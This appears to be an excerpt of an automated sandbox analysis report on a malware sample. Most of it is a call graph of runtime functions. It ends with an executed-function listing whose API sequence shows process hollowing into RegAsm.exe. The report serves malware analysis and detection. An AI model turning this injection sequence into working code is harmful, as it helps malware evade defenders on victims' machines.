100032 __fread_nolock 41 API calls 18651->18652 18653 10af72 18652->18653 18654 10af07 18653->18654 18655 104f0c ___free_lconv_mon 14 API calls 18653->18655 18656 10af25 18654->18656 18655->18654 18673 fe9f1 LeaveCriticalSection 18656->18673 18658 10af13 18658->18487 18660 100043 18659->18660 18663 10003f _Yarn 18659->18663 18661 10004a 18660->18661 18666 10005d __fread_nolock 18660->18666 18662 ff3fe __dosmaperr 14 API calls 18661->18662 18664 10004f 18662->18664 18663->18651 18665 fbbff __strnicoll 41 API calls 18664->18665 18665->18663 18666->18663 18667 100094 18666->18667 18668 10008b 18666->18668 18667->18663 18671 ff3fe __dosmaperr 14 API calls 18667->18671 18669 ff3fe __dosmaperr 14 API calls 18668->18669 18670 100090 18669->18670 18672 fbbff __strnicoll 41 API calls 18670->18672 18671->18670 18672->18663 18673->18658 18675 103d97 18674->18675 18676 103da5 18674->18676 18675->18676 18678 103dbd 18675->18678 18677 ff3fe __dosmaperr 14 API calls 18676->18677 18682 103dad 18677->18682 18680 103db7 18678->18680 18681 ff3fe __dosmaperr 14 API calls 18678->18681 18679 fbbff __strnicoll 41 API calls 18679->18680 18680->18432 18681->18682 18682->18679 18684 101baf 18683->18684 18685 101bde 18683->18685 18684->18433 18686 101bf5 18685->18686 18687 104f0c ___free_lconv_mon 14 API calls 18685->18687 18688 104f0c ___free_lconv_mon 14 API calls 18686->18688 18687->18685 18688->18684 18691 f719c 18689->18691 18692 f71b6 18691->18692 18693 1014ed std::_Facet_Register 2 API calls 18691->18693 18694 f71b8 std::_Facet_Register 18691->18694 18728 fea63 18691->18728 18692->18252 18697 114000 18692->18697 18693->18691 18737 f8020 18694->18737 18696 f79c0 18740 f1160 18697->18740 18702 f7197 std::_Facet_Register 16 API calls 18703 114021 18702->18703 18704 f7197 std::_Facet_Register 16 API calls 18703->18704 18719 114060 18703->18719 18709 114031 18704->18709 18705 1140aa 18710 f528b std::_Throw_Cpp_error 43 API calls 18705->18710 18706 11406a GetCurrentThreadId 18707 1140b1 18706->18707 18708 114074 18706->18708 18712 f528b std::_Throw_Cpp_error 43 API calls 18707->18712 18777 f50d5 WaitForSingleObjectEx 18708->18777 18762 fe516 18709->18762 18710->18707 18713 1140b8 18712->18713 18716 f528b std::_Throw_Cpp_error 43 API calls 18713->18716 18721 1140bf 18716->18721 18717 114087 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 18717->18254 18718 114057 18718->18719 18720 11409d 18718->18720 18719->18705 18719->18706 18783 f528b 18720->18783 18724 f1160 71 API calls 18723->18724 18725 1145a2 18724->18725 18726 f1e70 72 API calls 18725->18726 18727 1145a8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 18726->18727 18727->18252 18730 105136 18728->18730 18729 105174 18732 ff3fe __dosmaperr 14 API calls 18729->18732 18730->18729 18731 10515f HeapAlloc 18730->18731 18735 105148 __dosmaperr 18730->18735 18733 105172 18731->18733 18731->18735 18734 105179 18732->18734 18733->18734 18734->18691 18735->18729 18735->18731 18736 1014ed std::_Facet_Register 2 API calls 18735->18736 18736->18735 18738 f8067 RaiseException 18737->18738 18739 f803a 18737->18739 18738->18696 18739->18738 18741 f1196 18740->18741 18789 f2950 18741->18789 18744 f11e3 18748 f11e8 18744->18748 18794 f4dd0 18744->18794 18745 f1343 std::ios_base::_Init 18801 f2860 18745->18801 18746 f131d 18754 f1e70 18746->18754 18747 f130a 18747->18746 18797 f3540 18747->18797 18748->18745 18748->18747 18751 f1377 18752 f8020 CallUnexpected RaiseException 18751->18752 18753 f1385 18752->18753 18755 f1e90 18754->18755 18958 f1ee0 18755->18958 18759 f1e9a 18987 f4be0 18759->18987 18760 f46e0 43 API calls 18761 f1ed5 18760->18761 18761->18702 18763 fe537 18762->18763 18764 fe523 18762->18764 19260 fe4c6 18763->19260 18765 ff3fe __dosmaperr 14 API calls 18764->18765 18767 fe528 18765->18767 18769 fbbff __strnicoll 41 API calls 18767->18769 18771 fe533 18769->18771 18770 fe54c CreateThread 18772 fe56b GetLastError 18770->18772 18773 fe577 18770->18773 19285 fe3ba 18770->19285 18771->18718 19269 ff3a4 18772->19269 19274 fe438 18773->19274 18778 f511e 18777->18778 18779 f50ec 18777->18779 18778->18713 18778->18717 18780 f5109 CloseHandle 18779->18780 18781 f50f3 GetExitCodeThread 18779->18781 18780->18778 18781->18778 18782 f5104 18781->18782 18782->18780 18784 f52a1 std::_Throw_Cpp_error 18783->18784 19325 f51ab 18784->19325 18790 f2967 18789->18790 18791 f297b 18790->18791 18815 f46e0 18790->18815 18791->18744 18827 f6a01 18794->18827 18795 f4de3 18795->18748 18798 f35a3 18797->18798 18799 f357e 18797->18799 18798->18746 18799->18798 18831 f4d60 18799->18831 18802 f28a0 18801->18802 18802->18802 18851 f1450 18802->18851 18804 f28b4 18859 f2490 18804->18859 18806 f28c2 18807 f28ea std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 18806->18807 18810 f2911 18806->18810 18808 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18807->18808 18809 f290b 18808->18809 18809->18751 18811 fbc0f std::_Throw_Cpp_error 41 API calls 18810->18811 18812 f2916 18811->18812 18879 f7f9e 18812->18879 18816 f2997 18815->18816 18817 f4721 18815->18817 18816->18744 18818 f2950 43 API calls 18817->18818 18819 f472a 18818->18819 18820 f47a2 18819->18820 18821 f47dc std::ios_base::_Init 18819->18821 18820->18816 18822 f3540 43 API calls 18820->18822 18823 f2860 std::ios_base::_Init 43 API calls 18821->18823 18822->18816 18824 f480e 18823->18824 18825 f8020 CallUnexpected RaiseException 18824->18825 18826 f481c 18825->18826 18828 f6a10 18827->18828 18829 f6a23 _Yarn 18827->18829 18828->18795 18829->18828 18830 1006cb 69 API calls 18829->18830 18830->18828 18834 f39e0 18831->18834 18833 f4d7e 18833->18798 18835 f39fd 18834->18835 18836 f39f4 18834->18836 18835->18833 18837 f8020 CallUnexpected RaiseException 18836->18837 18838 f3a0c std::ios_base::_Init 18836->18838 18837->18838 18839 f2860 std::ios_base::_Init 43 API calls 18838->18839 18840 f3a43 18839->18840 18841 f8020 CallUnexpected RaiseException 18840->18841 18843 f3a52 18841->18843 18842 f3a80 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 18842->18833 18843->18842 18846 fbc0f 18843->18846 18847 fbb4b __strnicoll 41 API calls 18846->18847 18848 fbc1e 18847->18848 18849 fbc2c __Getctype 11 API calls 18848->18849 18850 fbc2b 18849->18850 18852 f14d9 18851->18852 18856 f1460 18851->18856 18908 f36f0 18852->18908 18854 f1465 _Yarn 18854->18804 18856->18854 18887 f13f0 18856->18887 18858 f14b3 _Yarn 18858->18804 18860 f24b8 18859->18860 18861 f2675 18860->18861 18864 f24c9 18860->18864 18862 f36f0 std::_Throw_Cpp_error 43 API calls 18861->18862 18863 f267a 18862->18863 18865 fbc0f std::_Throw_Cpp_error 41 API calls 18863->18865 18867 f13f0 std::_Throw_Cpp_error 43 API calls 18864->18867 18872 f24ce _Yarn 18864->18872 18866 f267f 18865->18866 18868 fbc0f std::_Throw_Cpp_error 41 API calls 18866->18868 18867->18872 18869 f2684 18868->18869 18871 f7f9e std::invalid_argument::invalid_argument 42 API calls 18869->18871 18870 f25ba std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 18873 f7f9e std::invalid_argument::invalid_argument 42 API calls 18870->18873 18874 f26b2 18871->18874 18872->18863 18872->18870 18875 f260f 18873->18875 18874->18806 18875->18866 18876 f2640 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 18875->18876 18877 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18876->18877 18878 f266f 18877->18878 18878->18806 18880 f2941 18879->18880 18881 f7fab 18879->18881 18880->18751 18881->18880 18882 fea63 _Yarn 15 API calls 18881->18882 18883 f7fc8 18882->18883 18884 f7fd8 18883->18884 18885 103d89 std::invalid_argument::invalid_argument 41 API calls 18883->18885 18886 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 18884->18886 18885->18884 18886->18880 18888 f1423 18887->18888 18889 f1400 18887->18889 18890 f1434 18888->18890 18893 f7197 std::_Facet_Register 16 API calls 18888->18893 18891 f143a 18889->18891 18892 f1407 18889->18892 18890->18858 18943 f36b0 18891->18943 18895 f7197 std::_Facet_Register 16 API calls 18892->18895 18896 f142d 18893->18896 18897 f140d 18895->18897 18896->18858 18898 f1416 18897->18898 18899 fbc0f std::_Throw_Cpp_error 41 API calls 18897->18899 18898->18858 18900 f1444 18899->18900 18901 f14d9 18900->18901 18905 f1460 18900->18905 18902 f36f0 std::_Throw_Cpp_error 43 API calls 18901->18902 18904 f14de 18902->18904 18903 f1465 _Yarn 18903->18858 18905->18903 18906 f13f0 std::_Throw_Cpp_error 43 API calls 18905->18906 18907 f14b3 _Yarn 18906->18907 18907->18858 18947 f506a 18908->18947 18944 f36bb std::_Facet_Register 18943->18944 18945 f8020 CallUnexpected RaiseException 18944->18945 18946 f36ca 18945->18946 18952 f4f8d 18947->18952 18950 f8020 CallUnexpected RaiseException 18951 f5089 18950->18951 18955 f27d0 18952->18955 18956 f7f9e std::invalid_argument::invalid_argument 42 API calls 18955->18956 18957 f27fe 18956->18957 18957->18950 18998 f4ecb 18958->18998 18961 f4ecb std::_Lockit::_Lockit 7 API calls 18963 f1f14 18961->18963 18962 f2064 18964 f4f23 std::_Lockit::~_Lockit 2 API calls 18962->18964 19004 f4f23 18963->19004 18966 f207d 18964->18966 18965 f1f35 18965->18962 18968 f1f97 18965->18968 18969 f1f82 18965->18969 18966->18759 18971 f7197 std::_Facet_Register 16 API calls 18968->18971 18970 f4f23 std::_Lockit::~_Lockit 2 API calls 18969->18970 18972 f1f8d 18970->18972 18974 f1f9e 18971->18974 18972->18759 18973 f203a 18975 f205e 18973->18975 19032 f2a70 18973->19032 18974->18973 18977 f4ecb std::_Lockit::_Lockit 7 API calls 18974->18977 19047 f5448 18975->19047 18979 f1fd2 18977->18979 18980 f2018 18979->18980 18981 f2087 18979->18981 19011 f5578 18980->19011 19050 f50aa 18981->19050 18988 f2950 43 API calls 18987->18988 18989 f4c1e 18988->18989 18990 f4ce3 std::ios_base::_Init 18989->18990 18992 f4ca8 18989->18992 18994 f2860 std::ios_base::_Init 43 API calls 18990->18994 18991 f1ece 18991->18760 18992->18991 18993 f3540 43 API calls 18992->18993 18993->18991 18995 f4d15 18994->18995 18996 f8020 CallUnexpected RaiseException 18995->18996 18997 f4d23 18996->18997 18999 f4eda 18998->18999 19000 f4ee1 18998->19000 19055 fea08 18999->19055 19001 f1efa 19000->19001 19060 f6d2a EnterCriticalSection 19000->19060 19001->18961 19001->18965 19005 fea16 19004->19005 19006 f4f2d 19004->19006 19113 fe9f1 LeaveCriticalSection 19005->19113 19007 f4f40 19006->19007 19112 f6d38 LeaveCriticalSection 19006->19112 19007->18965 19010 fea1d 19010->18965 19114 fecc3 19011->19114 19015 f559c 19016 f55ac 19015->19016 19017 fecc3 std::_Locinfo::_Locinfo_ctor 68 API calls 19015->19017 19018 f53d2 _Yarn 15 API calls 19016->19018 19017->19016 19019 f2023 19018->19019 19020 f568d 19019->19020 19220 fee34 19020->19220 19022 f5696 __Getctype 19023 f56ce 19022->19023 19024 f56b0 19022->19024 19026 fecfb __Getctype 41 API calls 19023->19026 19225 fecfb 19024->19225 19027 f56b7 19026->19027 19230 fee59 19027->19230 19030 f56ef 19030->18973 19253 f55c3 19032->19253 19035 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19038 f2a89 19035->19038 19036 f2ab7 19041 f2ace 19036->19041 19042 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19036->19042 19037 f2aa0 19037->19036 19040 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19037->19040 19038->19037 19039 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19038->19039 19039->19037 19040->19036 19043 f2ae5 19041->19043 19044 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19041->19044 19042->19041 19045 f2afc 19043->19045 19046 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19043->19046 19044->19043 19046->19045 19048 f7197 std::_Facet_Register 16 API calls 19047->19048 19049 f5453 19048->19049 19049->18962 19257 f5001 19050->19257 19053 f8020 CallUnexpected RaiseException 19054 f50c9 19053->19054 19061 106a70 19055->19061 19060->19001 19082 106376 19061->19082 19081 106aa2 19081->19081 19083 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19082->19083 19084 10638c 19083->19084 19085 106390 19084->19085 19086 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19085->19086 19087 1063a6 19086->19087 19088 1063aa 19087->19088 19089 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19088->19089 19090 1063c0 19089->19090 19091 1063c4 19090->19091 19092 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19091->19092 19093 1063da 19092->19093 19094 1063de 19093->19094 19095 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19094->19095 19096 1063f4 19095->19096 19097 1063f8 19096->19097 19098 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19097->19098 19099 10640e 19098->19099 19100 106412 19099->19100 19101 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19100->19101 19102 106428 19101->19102 19103 10642c 19102->19103 19104 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19103->19104 19105 106442 19104->19105 19106 106460 19105->19106 19107 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19106->19107 19108 106476 19107->19108 19109 106446 19108->19109 19110 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19109->19110 19111 10645c 19110->19111 19111->19081 19112->19007 19113->19010 19115 106a70 std::_Locinfo::_Locinfo_ctor 5 API calls 19114->19115 19116 fecd0 19115->19116 19125 fea6e 19116->19125 19119 f53d2 19120 f53e0 19119->19120 19124 f540b _Yarn 19119->19124 19121 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19120->19121 19122 f53ec 19120->19122 19121->19122 19122->19122 19123 fea63 _Yarn 15 API calls 19122->19123 19122->19124 19123->19124 19124->19015 19126 fea7a __FrameHandler3::FrameUnwindToState 19125->19126 19133 fe9a9 EnterCriticalSection 19126->19133 19128 fea88 19134 feac9 19128->19134 19133->19128 19159 fec28 19134->19159 19136 feae4 19137 fea95 19136->19137 19138 1041e0 __Getctype 41 API calls 19136->19138 19156 feabd 19137->19156 19139 feaf1 19138->19139 19183 107725 19139->19183 19142 feb1d 19142->19137 19145 fbc2c __Getctype 11 API calls 19142->19145 19143 105136 std::_Locinfo::_Locinfo_ctor 15 API calls 19144 feb42 19143->19144 19144->19137 19147 107725 std::_Locinfo::_Locinfo_ctor 43 API calls 19144->19147 19146 fec27 19145->19146 19148 feb5e 19147->19148 19149 feb65 19148->19149 19150 feb80 19148->19150 19149->19142 19151 feb77 19149->19151 19152 febab 19150->19152 19154 104f0c ___free_lconv_mon 14 API calls 19150->19154 19153 104f0c ___free_lconv_mon 14 API calls 19151->19153 19152->19137 19155 104f0c ___free_lconv_mon 14 API calls 19152->19155 19153->19137 19154->19152 19155->19137 19219 fe9f1 LeaveCriticalSection 19156->19219 19158 f5584 19158->19119 19160 fec34 19159->19160 19161 fec42 19159->19161 19189 102b8e 19160->19189 19204 107363 19161->19204 19164 fec3e 19164->19136 19166 fecb8 19168 fbc2c __Getctype 11 API calls 19166->19168 19167 104eaf __dosmaperr 14 API calls 19169 fec74 19167->19169 19173 fecc2 19168->19173 19170 fec9c 19169->19170 19171 107363 std::_Locinfo::_Locinfo_ctor 43 API calls 19169->19171 19172 104f0c ___free_lconv_mon 14 API calls 19170->19172 19174 fec8b 19171->19174 19175 fecb1 19172->19175 19176 106a70 std::_Locinfo::_Locinfo_ctor 5 API calls 19173->19176 19178 fec9e 19174->19178 19179 fec92 19174->19179 19175->19136 19177 fecd0 19176->19177 19180 fea6e std::_Locinfo::_Locinfo_ctor 68 API calls 19177->19180 19181 102b8e std::_Locinfo::_Locinfo_ctor 65 API calls 19178->19181 19179->19166 19179->19170 19182 fecf9 19180->19182 19181->19170 19182->19136 19184 107739 _Fputc 19183->19184 19210 1073a0 19184->19210 19187 fb93b _Fputc 41 API calls 19188 feb16 19187->19188 19188->19142 19188->19143 19190 102ba4 19189->19190 19191 102bb8 19189->19191 19192 ff3fe __dosmaperr 14 API calls 19190->19192 19193 1041e0 __Getctype 41 API calls 19191->19193 19194 102ba9 19192->19194 19195 102bbd 19193->19195 19196 fbbff __strnicoll 41 API calls 19194->19196 19197 106a70 std::_Locinfo::_Locinfo_ctor 5 API calls 19195->19197 19199 102bb4 19196->19199 19198 102bc5 19197->19198 19200 10cdcc __Getctype 41 API calls 19198->19200 19199->19164 19201 102bca 19200->19201 19202 102196 std::_Locinfo::_Locinfo_ctor 65 API calls 19201->19202 19203 102c0c 19202->19203 19203->19164 19205 107376 _Fputc 19204->19205 19206 1070b8 std::_Locinfo::_Locinfo_ctor 43 API calls 19205->19206 19207 10738e 19206->19207 19208 fb93b _Fputc 41 API calls 19207->19208 19209 fec59 19208->19209 19209->19166 19209->19167 19211 1073b7 19210->19211 19212 1073bb 19211->19212 19214 1073e3 19211->19214 19213 fbb82 _Fputc 41 API calls 19212->19213 19218 1073d9 19213->19218 19215 10747e std::_Locinfo::_Locinfo_ctor 43 API calls 19214->19215 19217 107405 19214->19217 19215->19217 19216 fbb82 _Fputc 41 API calls 19216->19218 19217->19216 19217->19218 19218->19187 19219->19158 19221 1041e0 __Getctype 41 API calls 19220->19221 19222 fee3f 19221->19222 19223 10507a __Getctype 41 API calls 19222->19223 19224 fee4f 19223->19224 19224->19022 19226 1041e0 __Getctype 41 API calls 19225->19226 19227 fed06 19226->19227 19228 10507a __Getctype 41 API calls 19227->19228 19229 fed16 19228->19229 19229->19027 19231 1041e0 __Getctype 41 API calls 19230->19231 19232 fee64 19231->19232 19233 10507a __Getctype 41 API calls 19232->19233 19234 f56df 19233->19234 19234->19030 19235 ff302 19234->19235 19236 ff30f 19235->19236 19241 ff34a 19235->19241 19237 fea63 _Yarn 15 API calls 19236->19237 19238 ff332 19237->19238 19238->19241 19244 107d3a 19238->19244 19241->19030 19242 fbc2c __Getctype 11 API calls 19243 ff360 19242->19243 19245 107d48 19244->19245 19246 107d56 19244->19246 19245->19246 19248 107d70 19245->19248 19247 ff3fe __dosmaperr 14 API calls 19246->19247 19252 107d60 19247->19252 19249 ff343 19248->19249 19251 ff3fe __dosmaperr 14 API calls 19248->19251 19249->19241 19249->19242 19250 fbbff __strnicoll 41 API calls 19250->19249 19251->19252 19252->19250 19254 f55cf 19253->19254 19255 f2a79 19253->19255 19256 fecc3 std::_Locinfo::_Locinfo_ctor 68 API calls 19254->19256 19255->19035 19255->19038 19256->19255 19258 f27d0 std::invalid_argument::invalid_argument 42 API calls 19257->19258 19259 f5013 19258->19259 19259->19053 19261 104eaf __dosmaperr 14 API calls 19260->19261 19262 fe4d7 19261->19262 19263 104f0c ___free_lconv_mon 14 API calls 19262->19263 19264 fe4e4 19263->19264 19265 fe4eb GetModuleHandleExW 19264->19265 19266 fe508 19264->19266 19265->19266 19267 fe438 16 API calls 19266->19267 19268 fe510 19267->19268 19268->18770 19268->18773 19282 ff3eb 19269->19282 19271 ff3af __dosmaperr 19272 ff3fe __dosmaperr 14 API calls 19271->19272 19273 ff3c2 19272->19273 19273->18773 19275 fe468 19274->19275 19276 fe444 19274->19276 19275->18718 19277 fe44a CloseHandle 19276->19277 19278 fe453 19276->19278 19277->19278 19279 fe459 FreeLibrary 19278->19279 19280 fe462 19278->19280 19279->19280 19281 104f0c ___free_lconv_mon 14 API calls 19280->19281 19281->19275 19283 104331 __dosmaperr 14 API calls 19282->19283 19284 ff3f0 19283->19284 19284->19271 19286 fe3c6 __FrameHandler3::FrameUnwindToState 19285->19286 19287 fe3cd GetLastError ExitThread 19286->19287 19288 fe3da 19286->19288 19289 1041e0 __Getctype 41 API calls 19288->19289 19290 fe3df 19289->19290 19299 106af1 19290->19299 19294 fe3f6 19307 fe599 19294->19307 19300 fe3ea 19299->19300 19301 106b03 GetPEB 19299->19301 19300->19294 19304 1069fc 19300->19304 19301->19300 19302 106b16 19301->19302 19310 106622 19302->19310 19305 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19304->19305 19306 106a18 19305->19306 19306->19294 19313 fe46f 19307->19313 19311 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19310->19311 19312 10663e 19311->19312 19312->19300 19314 104331 __dosmaperr 14 API calls 19313->19314 19316 fe47a 19314->19316 19315 fe4bc ExitThread 19316->19315 19318 fe493 19316->19318 19322 106a37 19316->19322 19319 fe4a6 19318->19319 19320 fe49f CloseHandle 19318->19320 19319->19315 19321 fe4b2 FreeLibraryAndExitThread 19319->19321 19320->19319 19321->19315 19323 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19322->19323 19324 106a50 19323->19324 19324->19318 19326 f51b7 __EH_prolog3_GS 19325->19326 19335 f23e0 19326->19335 19329 f2490 std::_Throw_Cpp_error 43 API calls 19330 f51e0 19329->19330 19339 f2a10 19330->19339 19332 f51e8 19344 f76c1 19332->19344 19336 f2401 19335->19336 19336->19336 19337 f1450 std::_Throw_Cpp_error 43 API calls 19336->19337 19338 f2413 19337->19338 19338->19329 19340 f2a1b 19339->19340 19341 f2a36 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19339->19341 19340->19341 19342 fbc0f std::_Throw_Cpp_error 41 API calls 19340->19342 19341->19332 19343 f2a5a 19342->19343 19343->19332 19345 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19344->19345 19346 f76cb 19345->19346 19346->19346 19348 103d05 19347->19348 19349 103d17 ___scrt_uninitialize_crt 19347->19349 19350 103d13 19348->19350 19352 ffa03 19348->19352 19349->18270 19350->18270 19355 ff890 19352->19355 19358 ff784 19355->19358 19359 ff790 __FrameHandler3::FrameUnwindToState 19358->19359 19366 fe9a9 EnterCriticalSection 19359->19366 19361 ff806 19375 ff824 19361->19375 19364 ff79a ___scrt_uninitialize_crt 19364->19361 19367 ff6f8 19364->19367 19366->19364 19368 ff704 __FrameHandler3::FrameUnwindToState 19367->19368 19378 ff57b EnterCriticalSection 19368->19378 19370 ff747 19392 ff778 19370->19392 19371 ff70e ___scrt_uninitialize_crt 19371->19370 19379 ff99e 19371->19379 19424 fe9f1 LeaveCriticalSection 19375->19424 19377 ff812 19377->19350 19378->19371 19380 ff9b3 _Fputc 19379->19380 19381 ff9ba 19380->19381 19382 ff9c5 19380->19382 19384 ff890 ___scrt_uninitialize_crt 70 API calls 19381->19384 19383 ff935 ___scrt_uninitialize_crt 66 API calls 19382->19383 19385 ff9cf 19383->19385 19386 ff9c0 19384->19386 19385->19386 19388 105f6b _Fputc 41 API calls 19385->19388 19387 fb93b _Fputc 41 API calls 19386->19387 19389 ff9fd 19387->19389 19390 ff9e6 19388->19390 19389->19370 19395 10813a 19390->19395 19423 ff58f LeaveCriticalSection 19392->19423 19394 ff766 19394->19364 19396 108158 19395->19396 19397 10814b 19395->19397 19399 1081a1 19396->19399 19402 10817f 19396->19402 19398 ff3fe __dosmaperr 14 API calls 19397->19398 19401 108150 19398->19401 19400 ff3fe __dosmaperr 14 API calls 19399->19400 19403 1081a6 19400->19403 19401->19386 19406 108098 19402->19406 19405 fbbff __strnicoll 41 API calls 19403->19405 19405->19401 19407 1080a4 __FrameHandler3::FrameUnwindToState 19406->19407 19419 10bcdf EnterCriticalSection 19407->19419 19409 1080b3 19410 10bdb6 __fread_nolock 41 API calls 19409->19410 19417 1080f8 19409->19417 19412 1080df FlushFileBuffers 19410->19412 19411 ff3fe __dosmaperr 14 API calls 19413 1080ff 19411->19413 19412->19413 19414 1080eb GetLastError 19412->19414 19420 10812e 19413->19420 19415 ff3eb __dosmaperr 14 API calls 19414->19415 19415->19417 19417->19411 19419->19409 19421 10bd02 ___scrt_uninitialize_crt LeaveCriticalSection 19420->19421 19422 108117 19421->19422 19422->19401 19423->19394 19424->19377 22879 f63ef 22880 f6403 22879->22880 22881 f5df3 69 API calls 22880->22881 22886 f645e 22880->22886 22882 f642e 22881->22882 22883 f644b 22882->22883 22884 1003c9 68 API calls 22882->22884 22882->22886 22883->22886 22887 ffba9 22883->22887 22884->22883 22888 ffbc9 22887->22888 22889 ffbb4 22887->22889 22891 ffbe6 22888->22891 22892 ffbd1 22888->22892 22890 ff3fe __dosmaperr 14 API calls 22889->22890 22893 ffbb9 22890->22893 22901 1093f2 22891->22901 22894 ff3fe __dosmaperr 14 API calls 22892->22894 22896 fbbff __strnicoll 41 API calls 22893->22896 22897 ffbd6 22894->22897 22899 ffbc4 22896->22899 22900 fbbff __strnicoll 41 API calls 22897->22900 22898 ffbe1 22898->22886 22899->22886 22900->22898 22902 109406 _Fputc 22901->22902 22907 108e07 22902->22907 22905 fb93b _Fputc 41 API calls 22906 109420 22905->22906 22906->22898 22908 108e13 __FrameHandler3::FrameUnwindToState 22907->22908 22909 108e1a 22908->22909 22910 108e3d 22908->22910 22911 fbb82 _Fputc 41 API calls 22909->22911 22918 ff57b EnterCriticalSection 22910->22918 22917 108e33 22911->22917 22913 108e4b 22919 108e96 22913->22919 22915 108e5a 22932 108e8c 22915->22932 22917->22905 22918->22913 22920 108ea5 22919->22920 22921 108ecd 22919->22921 22922 fbb82 _Fputc 41 API calls 22920->22922 22923 105f6b _Fputc 41 API calls 22921->22923 22924 108ec0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22922->22924 22925 108ed6 22923->22925 22924->22915 22935 10a1ed 22925->22935 22927 108f97 22927->22924 22950 109037 22927->22950 22929 108f80 22938 1091f6 22929->22938 22957 ff58f LeaveCriticalSection 22932->22957 22934 108e94 22934->22917 22936 10a004 45 API calls 22935->22936 22937 108ef4 22936->22937 22937->22924 22937->22927 22937->22929 22939 109205 ___scrt_uninitialize_crt 22938->22939 22940 105f6b _Fputc 41 API calls 22939->22940 22942 109221 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22940->22942 22941 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22943 10939f 22941->22943 22944 10a1ed 45 API calls 22942->22944 22949 10922d 22942->22949 22943->22924 22945 109281 22944->22945 22946 1092b3 ReadFile 22945->22946 22945->22949 22947 1092da 22946->22947 22946->22949 22948 10a1ed 45 API calls 22947->22948 22948->22949 22949->22941 22951 105f6b _Fputc 41 API calls 22950->22951 22952 10904a 22951->22952 22953 10a1ed 45 API calls 22952->22953 22956 109092 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22952->22956 22954 1090e5 22953->22954 22955 10a1ed 45 API calls 22954->22955 22954->22956 22955->22956 22956->22924 22957->22934

        Executed Functions

        Function 022C018D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282threadinjectionmemoryCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
        • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,022C00FF,022C00EF), ref: 022C02FC
        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 022C030F
        • Wow64GetThreadContext.KERNEL32(00000120,00000000), ref: 022C032D
        • ReadProcessMemory.KERNELBASE(0000011C,?,022C0143,00000004,00000000), ref: 022C0351
        • VirtualAllocEx.KERNELBASE(0000011C,?,?,00003000,00000040), ref: 022C037C
        • TerminateProcess.KERNELBASE(0000011C,00000000), ref: 022C039B
        • WriteProcessMemory.KERNELBASE(0000011C,00000000,?,?,00000000,?), ref: 022C03D4
        • WriteProcessMemory.KERNELBASE(0000011C,00400000,?,?,00000000,?,00000028), ref: 022C041F
        • WriteProcessMemory.KERNELBASE(0000011C,?,?,00000004,00000000), ref: 022C045D
        • Wow64SetThreadContext.KERNEL32(00000120,023F0000), ref: 022C0499
        • ResumeThread.KERNELBASE(00000120), ref: 022C04A8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2601466933.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_22c0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
        • API String ID: 2440066154-1257834847
        • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
        • Instruction ID: 041cbde26a960da5f551736547e992549d5cd6936eab447ac7d10db5ee5554cc
        • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
        • Instruction Fuzzy Hash: 66B1E67264024AAFDB60CFA8CC80BDA77A5FF88714F158524EA0CAB345D774FA41CB94
        Function 00114920 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 214synchronizationthreadCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
